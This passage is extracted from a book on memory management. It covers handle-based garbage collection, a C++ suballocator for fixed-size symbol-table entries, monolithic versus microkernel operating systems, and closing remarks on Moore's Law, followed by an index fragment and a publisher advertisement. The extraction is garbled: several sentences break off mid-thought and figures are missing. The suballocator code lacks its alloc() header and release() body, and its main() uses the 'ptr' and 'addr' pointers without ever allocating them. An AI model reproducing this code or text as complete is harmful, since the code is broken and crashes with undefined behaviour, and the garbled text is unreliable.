reclaims garbage. To minimize fragmentation, the occupied blocks
are all shifted down to the bottom of the heap. Because handles are
being used instead of actual pointers, all the collector has to do
when it makes this shift is update all the handles. The application
variables can remain untouched.
This process is illustrated in Figure 5.14.
Figure 5.14
Real-Time Behavior
With my mark-sweep collector, there was a noticeable decrease in
execution time when the frequency of garbage collection was
decreased. This might lead you to think that the best way to speed
Chapter 5
Figure 5.15
Multithreaded Support
All the implementations presented in this book have been single-
threaded; this was a conscious decision on my part in order to keep
things simple so that you could focus on the main ideas. The handi-
cap of using a single-threaded garbage collection scheme is that
reclamation is done on the critical path of execution.
I think that most garbage collection implementations assume a
Chapter 5
Figure 5.16
Chapter 5
Chapter 6
Miscellaneous Topics
Suballocators
Normally, memory managers have to suffer through the slings and
arrows of not knowing when or how much memory will be
requested by an application. There are, however, some circum-
stances where you will know in advance how large an application’s
memory requests will be or how many there will be. If this is the
case, you can construct a dedicated memory manager known as a
suballocator to handle memory requests and reap tremendous per-
formance gains.
A suballocator is an allocator that is built on top of another alloca-
tor. An example of where suballocators could be utilized is in a
compiler. Specifically, one of the primary duties of a compiler is to
build a symbol table. Symbol tables are memory-resident databases
that serve as a repository for application data. They are typically
built using a set of fixed-size structures. The fact that a symbol
table’s components are all fixed in size makes a compiler fertile
ground for the inclusion of a suballocator. Instead of calling
malloc() to allocate symbol table objects, you can allocate a large
pool of memory and use a suballocator to allocate symbol table
objects from that pool.
343
344 Chapter 6
Figure 6.1
struct Indices
{
U1 free;
U4 index1;
U4 index2;
U4 index3;
};
Miscellaneous Topics 345
class SubAllocator
{
private:
struct Indices *indices;
U4 size;
U4 lastAlloc;
public:
SubAllocator(U4 nElms);
~SubAllocator();
struct Indices *alloc();
void release(struct Indices *addr);
void printList();
};
SubAllocator::SubAllocator(U4 nElms)
{
U4 i;
size = nElms;
indices = (struct Indices*)malloc(size*(sizeof(struct
Indices)));
if(indices==NULL)
{
printf("SubAllocator::SubAllocator(%lu):",size);
printf("could not allocate list\n");
exit(1);
}
for(i=0;i<size;i++)
{
indices[i].free =TRUE;
}
lastAlloc = 0;
return;
}/*end constructor--------------------------------------------*/
SubAllocator::~SubAllocator()
{
free(indices);
return;
Chapter 6
}/*end destructor---------------------------------------------*/
if(lastAlloc==size-1){ lastAlloc=0; }
for(i=lastAlloc;i<size;i++)
{
if(indices[i].free==TRUE)
{
indices[i].free=FALSE;
lastAlloc = i;
return(&indices[i]);
}
}
for(i=0;i<lastAlloc;i++)
{
if(indices[i].free==TRUE)
{
indices[i].free=FALSE;
lastAlloc = i;
return(&indices[i]);
}
}
return(NULL);
}/*end alloc--------------------------------------------------*/
}/*end release------------------------------------------------*/
void SubAllocator::printList()
{
U4 i;
for(i=0;i<size;i++)
{
if(indices[i].free==FALSE)
{
printf("indices[%lu] “,i);
printf("[%lu, “,indices[i].index1);
printf("%lu,",indices[i].index2);
Miscellaneous Topics 347
printf("%lu]\n",indices[i].index3);
}
else
{
printf("indices[%lu]=FREE\n",i);
}
}
return;
}/*end printList----------------------------------------------*/
void main()
{
U4 ticks1,ticks2;
U4 nAllocations=1024;
U4 i;
SubAllocator *ptr;
struct Indices **addr;
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
addr[i] = (*ptr).alloc();
if(addr[i]==NULL)
{
printf("addr[%lu]==NULL\n",i);
exit(1);
}
}
for(i=0;i<nAllocations;i++)
{
(*ptr).release(addr[i]);
}
ticks2 = GetTickCount();
delete(ptr);
free(addr);
Chapter 6
printf("msecs=%lu\n",ticks2-ticks1);
return;
}/*end main---------------------------------------------------*/
348 Chapter 6
Monolithic Versus
Microkernel Architectures
All of the operating systems that we looked at in Chapter 2 were
monolithic, which is to say that all the components of the operating
system (the task scheduler, the memory manager, the file system
manager, and the device drivers) exist in a common address space
and everything executes in kernel mode (at privilege level 0). In
other words, a monolithic operating system behaves like one big
program. UNIX, Linux, MMURTL, DOS, and Windows are all mono-
lithic operating systems.
Another approach to constructing an operating system is to use a
microkernel design. With a microkernel operating system, only a
small portion of the operating system functions in kernel mode.
Typically, this includes task scheduling, interrupt handling,
low-level device drivers, and a message-passing subsystem to pro-
vide interprocess communication primitives. The rest of the
operating system components, like the memory manager and the
file system manager, run as separate tasks in user space and com-
municate with each other using the kernel’s message passing
facilities. MINIX, Mach, and Chorus are examples of microkernel
operating systems.
The difference between monolithic and microkernel architectures
is displayed in Figure 6.2.
The researchers supporting the microkernel school of thought
claim that the enforcement of modular operating system compo-
nents provides a cleaner set of interfaces. This characteristic, in
turn, makes it easier to maintain and modify an operating system.
Operating systems are often judged with regard to how well they
accommodate change. The operating systems that tend to survive
are the ones that are easy to extend and enhance. By allowing core
Miscellaneous Topics 349
Figure 6.2
In other words, it is not exactly what you are building but how
you build it that makes the difference between success and failure.
Table 6.1 presents a comparison of monolithic and microkernel
design approaches.
Table 6.1
Monolithic Microkernel
Maintainability complicated interaction marginally better
Stability kernel errors lead to crash questionable isolation of errors
Performance faster slower, messaging overhead
Security everything in kernel mode core components in user mode
Closing Thoughts
In 1965, an Intel Corporation co-founder named Gordon Moore sug-
gested that the number of transistors in a processor would double
every 18 months. This rule of thumb became known as Moore’s
Law. Moore’s Law implies that the linear dimensions of a transistor
are cut in half every three years (see Figure 6.3).
Figure 6.3
= 1/1000 m
The diameter of a hydrogen atom, in its ground state, is roughly
one-tenth of a nanometer.
Solid-state physicists will tell you that an electron needs a path of
about three atoms wide to move from one point to another. If the
352 Chapter 6
path width gets any smaller, quantum mechanics takes hold and the
electron stops behaving in a predictable manner.
In 1989, Intel released the 80486 processor. The 80486 had tran-
sistors whose linear dimensions were 1 micrometer. Using 1989 as
a starting point, let’s see how long Moore’s Law will last before it
hits the three-atom barrier.
Table 6.2
Year Size Processor
1989 1 micrometer Intel 80486 (1 micrometer)
1992 0.5
1995 0.25 Pentium Pro (.35 micrometers)
1998 0.125
2001 0.0625 Pentium 4 (.18 micrometers)
2004 0.03125
2007 0.015625
2010 0.0078125
2013 0.00390625
2016 0.001953125
2019 0.000976563
2022 0.000488281
inadequate for the problems that it faced. Take the Bendix G-15, for
example, which had 2,160 words of magnetic drum memory in 1961.
In order to squeeze every drop of performance out of a machine,
you needed to be able to make efficient use of limited resources.
Program size was typically the biggest concern. If instructions
existed in more than one spot, they were consolidated into a proce-
dure. This meant that the execution path of a task tended to spend a
lot of time jumping around memory. I remember two Control Data
engineers telling me about how they simulated an entire power grid
in southern California using less than 16KB of memory.
NOTE In 2002, with the advent of 256MB SDRAM chips and 512KB
L2 caches, program size is not such a pressing concern. Program
speed is the new focal issue. This has led to an inversion of program-
ming techniques. Instead of placing each snippet of redundant code in
its own function, developers have begun to deliberately insert redun-
dant instructions. For example, inline functions can be used to avoid
the overhead of setting up an activation record and jumping to
another section of code.
When Moore’s Law meets the laws of physics, the computer indus-
try will once again be forced to look for better solutions that are
purely software-based, primarily because all the other alternatives
will be more expensive. One positive result of this is that the neces-
sity to improve performance will drive the discovery of superior
algorithms. Computer science researchers may see a new heyday.
The demise of Moore’s Law may also herald the arrival of less
desirable developments. Lest you forget, major technical advances,
such as radar and nuclear energy, were first put to use as weapons
of war. Potential abuse of technology has already surfaced, even in
this decade. At Super Bowl XXXV, hundreds of people involuntarily
took part in a virtual lineup performed by Face Recognition Soft-
ware. Is there a reason why people who wish to watch a football
game need to be treated like suspects in a criminal case? Why was
the public only informed about the use of this software after the
game had occurred?
This is just the beginning. Artificial intelligence programs will
eventually be just as sophisticated and creative as humans. To a cer-
tain extent, they already are. In 1997, an IBM RS/6000 box named
Deep Blue conquered the world chess champion, Garry Kasparov, in
Chapter 6
355
Index
356
Index
Feynman, Dick, xv I
FIFO, 110 IDTR, 6
FLAGS, 15 incremental garbage collection, 302
flat memory model, 31 Intel Corporation, xi, xvi, 1, 6, 11, 13
Flowers, Tommy, xiv internal fragmentation, 156
FLOW-MATIC, 171 International Business Machines (IBM)
Forbin, Charles, xiv, 354 705, xiv
formal parameter, 146 Interrupt Service Routine (ISR), 52
FORTRAN, 177 interrupt vector table (IVT), 48, 52
ANSI standards, 178 inverse transform method, 218
program organization, 180 IP, 15, 37
free(), 128, 157-158
FS, 6, 16 J
function epilogue, 139 Java, 193
function prologue, 138 application memory management, 195
explicit pointers, 193
G heap, 195
garbage, 281 method area, 195
garbage collection, 160 multiple inheritance, 193
collectors, 281 naming scheme, 193
comparable performance, 164 operator overloading, 193
Gates, Bill, 5, 18, 46, 93 thread, program counter, 195
GDT, 20 thread, stack, 195
GDTR, 6 threads, 195
generating random numbers, 215 versus C++, 194
generational garbage collector, 338 Java virtual machine (JVM), 195
GetProcessHeap(), 111 Java virtual machine specification, 195, 201
GetTickCount(), 214 javap, 198-199
gigabyte, 5
Global Descriptor Table, see GDT K
Global Descriptor Table Register, see K&R C, xxiv
GDTR Kasparov, Garry, 353
global variable, 146 kernel mode driver, 46, 100
Gosling, James, 192 Kernighan, Brian, xxiv, 184
GS, 6, 16 Kilby, Jack, xvi
kilobyte, 5
H
handles versus addresses, 335 L
heap, 129, 132, 137 L1 cache, 7
allocation, 151 L2 cache, 7
HeapAlloc(), 111 language complexity threshold, 170
HeapFree(), 111 latency, 156
HeapReAlloc(), 111 LDT, 20
Heisenberg’s Uncertainty Principle, xvi LDTR, 6, 20-21
Hennessey, John, 212 Lee, David M., xv
HIMEM.SYS, 58 Lee, Stan, xxvi
Hopper, Grace Murray, 171 Lehmer, Dick, 219
human computers, xv LeMarchand cube, 45
LGDTR, 37, 202
357
Index
358
Index
359
Index
360
Looking for more?
Check out Wordware’s market-leading Windows Programming/
Development and Web Programming/Development Libraries
featuring the following new releases.
Search Engine Optimization Search Engine Positioning RoboHelp for the Web
with WebPosition Gold 2 1-55622-804-X • $49.95 1-55622-954-2 • $49.95
1-55622-924-0 • $49.95 7½ x 9¼ • 576 pp. 7½ x 9¼ • 448 pp.
7½ x 9¼ • 360 pp.
The source code for most of the examples in this book is provided in
a downloadable file available at www.wordware.com/memory.
When the file is unzipped, it will be organized into two folders:
deploy and meta-inf. The source code in the deploy folder is divided
into subfolders named for the chapters.